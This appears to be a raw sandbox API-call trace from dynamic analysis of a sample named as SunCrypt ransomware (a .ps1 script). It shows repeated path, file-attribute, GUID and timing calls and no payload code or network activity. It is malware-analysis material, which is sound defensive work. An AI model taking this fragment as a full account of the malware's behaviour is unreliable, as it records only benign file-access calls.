0x3b [0104.649] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.649] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.651] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701746783091) returned 1 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x511a2f17, Data2=0x91ac, Data3=0x4e91, Data4=([0]=0x9e, [1]=0x2f, [2]=0x35, [3]=0xea, [4]=0xb9, [5]=0x40, [6]=0xf8, [7]=0xd2))) returned 0x0 [0104.653] 
GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.653] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701746948600) returned 1 [0104.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a 
[0104.656] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701747276394) returned 1 [0104.656] EtwEventActivityIdControl () returned 0x0 [0104.656] EtwEventActivityIdControl () returned 0x0 [0104.656] EtwEventActivityIdControl () returned 0x0 [0104.657] EtwEventActivityIdControl () returned 0x0 [0104.657] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x5159228c, Data2=0xb456, Data3=0x48dd, Data4=([0]=0xbe, [1]=0x5d, [2]=0x25, [3]=0xa3, [4]=0xf7, [5]=0xc3, [6]=0x1c, [7]=0x99))) returned 0x0 [0104.657] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.658] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701747432470) returned 1 [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.658] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) 
returned 1 [0104.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.661] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701747715354) returned 1 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x82e41769, Data2=0xfb6f, Data3=0x47cd, Data4=([0]=0xaa, [1]=0x98, [2]=0x2c, [3]=0xc7, [4]=0x95, [5]=0x8, [6]=0xba, [7]=0x46))) returned 0x0 [0104.662] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.662] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701747859553) returned 1 [0104.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.662] 
GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.665] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701748139380) returned 1 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x96970b82, Data2=0xb44c, Data3=0x4341, Data4=([0]=0xa2, [1]=0xd6, [2]=0x45, [3]=0x89, [4]=0x22, [5]=0xdd, [6]=0x5b, [7]=0xac))) returned 0x0 [0104.666] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.666] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701748300737) returned 1 
[0104.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.675] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701749156744) returned 1 [0104.675] EtwEventActivityIdControl () returned 0x0 [0104.675] EtwEventActivityIdControl () returned 0x0 [0104.675] 
EtwEventActivityIdControl () returned 0x0 [0104.675] EtwEventActivityIdControl () returned 0x0 [0104.675] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xcd9a6a9e, Data2=0x567, Data3=0x467b, Data4=([0]=0x87, [1]=0xdf, [2]=0xa8, [3]=0x36, [4]=0xee, [5]=0xba, [6]=0x38, [7]=0x5f))) returned 0x0 [0104.676] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.676] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701749295744) returned 1 [0104.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 
lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.682] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701749859051) returned 1 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbf32bf19, Data2=0xba73, Data3=0x407f, Data4=([0]=0xb5, [1]=0x20, [2]=0x52, [3]=0xec, [4]=0x41, [5]=0xcf, [6]=0x3b, [7]=0xdd))) returned 0x0 [0104.683] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.683] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701749982598) returned 1 [0104.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.684] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: 
lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.685] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701750203847) returned 1 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x49d722de, Data2=0xe1a1, Data3=0x45a3, Data4=([0]=0x83, [1]=0x61, [2]=0x9f, [3]=0xfb, [4]=0xbe, [5]=0x92, [6]=0xf2, [7]=0xa3))) returned 0x0 [0104.686] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.687] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701750325616) returned 1 [0104.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.687] GetFullPathNameW 
(in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.692] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701750910095) returned 1 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2a6f8775, Data2=0x8d76, Data3=0x49cb, Data4=([0]=0xbf, [1]=0xd4, [2]=0xc3, 
[3]=0xef, [4]=0x3b, [5]=0x7c, [6]=0x52, [7]=0x8b))) returned 0x0 [0104.694] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.694] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701751370258) returned 1 [0104.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.697] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.700] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701751679305) returned 1 [0104.700] EtwEventActivityIdControl () returned 0x0 [0104.700] EtwEventActivityIdControl () returned 0x0 [0104.700] EtwEventActivityIdControl () returned 0x0 [0104.701] EtwEventActivityIdControl () returned 0x0 [0104.701] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7d9be5af, Data2=0xc250, Data3=0x4924, Data4=([0]=0x94, [1]=0x15, [2]=0xa1, [3]=0x6a, [4]=0x11, [5]=0x59, [6]=0x5, [7]=0xe7))) returned 0x0 [0104.701] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.702] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701751841166) returned 1 [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, 